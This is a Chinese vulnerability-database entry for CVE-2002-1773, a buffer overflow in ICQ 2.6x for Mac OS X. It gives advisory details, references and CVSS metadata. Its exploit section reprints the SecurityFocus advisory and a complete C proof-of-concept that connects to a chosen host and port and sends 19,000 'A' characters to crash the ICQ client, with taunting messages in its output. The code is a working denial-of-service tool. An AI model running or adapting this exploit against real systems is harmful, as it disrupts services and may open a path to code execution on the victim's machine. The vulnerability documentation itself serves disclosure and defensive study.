ICQ For MacOS X Client服务拒绝漏洞

ICQ For MacOS X Client服务拒绝漏洞

漏洞ID 1106599 漏洞类型 缓冲区溢出
发布时间 2002-02-05 更新时间 2005-10-20
图片[1]-ICQ For MacOS X Client服务拒绝漏洞-安全小百科CVE编号 CVE-2002-1773
图片[2]-ICQ For MacOS X Client服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200212-249
漏洞平台 OSX CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21275
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-249
|漏洞详情
MacOSX从10.0到10.1.2版本中的ICQ2.6x存在缓冲区溢出漏洞。远程攻击者可以通过超长请求导致服务拒绝和可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/4031/info

ICQ For MacOS X is a port of the popular Mirabilis ICQ client to the Apple MacOS X platform. It is freely available.

It is possible to cause MacOS X ICQ clients to crash by sending an excessively long request (19000+ characters). MacOS X ICQ clients normally bind to ports 49152 and 49159.

This is likely due to an unchecked buffer of some sort, so the possibility of exploiting this condition to execute arbitrary attacker-supplied instructions does exist. Though this possibility has not been confirmed.

This issue has been reported for ICQ For MacOS X version 2.6X Beta. Other versions may also be prone to this issue. 

/*
 * OSX ICQ Dos. [email protected]
 * Proof of concept. Worked on early versions of Licq. Now it apparently works
 * for various versions of OSX ICQ clients.
 * Tested and works on: ICQ MacOSX Ver 2.6x Beta Build 7
 * and several others.
 */

#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

int main(int argc, char **argv){
  char buf[19000]; int i, sock, result; struct sockaddr_in sin; struct hostent *gothost;
  printf("So you wanna DoS ICQ...n [email protected]");
  if (argc < 3) {
      fprintf(stderr, "Usage: %s <icqclient> <port>njeez. get it right.n", argv[0]);
      exit(-1);
    }
  gothost = gethostbyname(argv[1]);
  if (!gothost){
      fprintf(stderr, "%s: Host resolv failed. Tard.n", argv[1]);
      exit(-1);
    }
  sin.sin_family = AF_INET; sin.sin_port = htons(atoi(argv[2]));
  sin.sin_addr = *(struct in_addr *)gothost->h_addr; sock = socket(AF_INET, SOCK_STREAM, 0);
  result = connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
  if (result != 0) {
      fprintf(stderr, "Connect Failed. reTard. %sn", argv[1]);
      exit(-1);
    }
  if (sock < 0){
      fprintf(stderr, "Error in socket.");
      exit(-1);
    }
  for (i=0; i<19000; i++) /* send loop shaboing boing boing */
    strncat(buf, "A", 1);
  send(sock, buf, sizeof(buf), 0);
  close(sock);
  fprintf(stdout, "ShinryuHadokenn..And an angry flurry of As flies from your outstreached hand. heh.nn");
}
|参考资料

来源:XF
名称:icq-macos-dos(8085)
链接:http://xforce.iss.net/xforce/xfdb/8085
来源:BID
名称:4031
链接:http://www.securityfocus.com/bid/4031

相关推荐: CarLine Forum Russian Board 4.2 – ‘edit_msg.php’ Multiple Cross-Site Scripting Vulnerabilities

CarLine Forum Russian Board 4.2 – ‘edit_msg.php’ Multiple Cross-Site Scripting Vulnerabilities 漏洞ID 1055189 漏洞类型 发布时间 2005-06-23 更…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享